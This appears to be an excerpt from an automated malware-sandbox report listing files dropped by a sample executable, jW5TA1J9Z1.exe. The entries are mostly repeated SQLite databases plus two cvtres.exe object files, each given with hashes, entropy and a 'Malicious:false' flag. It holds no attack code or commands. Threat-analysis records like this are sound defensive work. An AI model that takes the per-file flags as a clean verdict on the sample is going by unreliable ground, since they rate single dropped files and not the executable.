                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08235737944063153
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Wed Aug 21 09:57:27 2024, 1st section name ".debug$S"
                                                                    Category:modified
                                                                    Size (bytes):1932
                                                                    Entropy (8bit):4.628955843517792
                                                                    Encrypted:false
                                                                    SSDEEP:48:DaLz1aZtKOZm6lmuulB+hnqXSfbNtmh5N:en1eKOc62TkZzNty5N
                                                                    MD5:1FA4EE77F57FA9E9D8C7F6B24F8FE3D5
                                                                    SHA1:693A762C45A166452FC4655F4F0A518216C6A31A
                                                                    SHA-256:88E91996A4C559D736CBBF4EE3B8D2C8023E7B6D442CE94BCD2499C73743E4E9
                                                                    SHA-512:DFDC75BF2EE4E413875E63651B260E7296F9F9CEF18E8AF415AAF98CB62EA5848EEDF63E6A1B329A0981250CCAA9E30AE96816CCC08B06B9BE5766AC706BD6C8
                                                                    Malicious:false
                                                                    Preview:L......f.............debug$S........\...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f0, 10 symbols, created Wed Aug 21 09:57:28 2024, 1st section name ".debug$S"
                                                                    Category:modified
                                                                    Size (bytes):1960
                                                                    Entropy (8bit):4.5701173447307255
                                                                    Encrypted:false
                                                                    SSDEEP:24:HeS9YIO0goOwYZHZwKOZmN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+GUZ:Eh0rfYZiKOZmyluOulajfqXSfbNtmhxZ
                                                                    MD5:C0A2A0119349A6477AB14EED8AE8ABE4
                                                                    SHA1:6D3409850B6B44DF4BAD55A91E66B586B8E89A2A
                                                                    SHA-256:F2A98AB0570C36D4192192EF14EF6D8020A548898961DD3E25E21C4BF4A2247A
                                                                    SHA-512:30679AE2B1636CA91A7882E31E32BB21B638B38751837117D285AD9605190D7126F5206E8DD2E2A6DF20E8965B8AFF1D8A96207E1EE6352244098F5BE11D326A
                                                                    Malicious:false
                                                                    Preview:L......f.............debug$S........@...................@..B.rsrc$01................l...........@..@.rsrc$02........p...................@..@........=....c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP.....................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RESE4ED.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
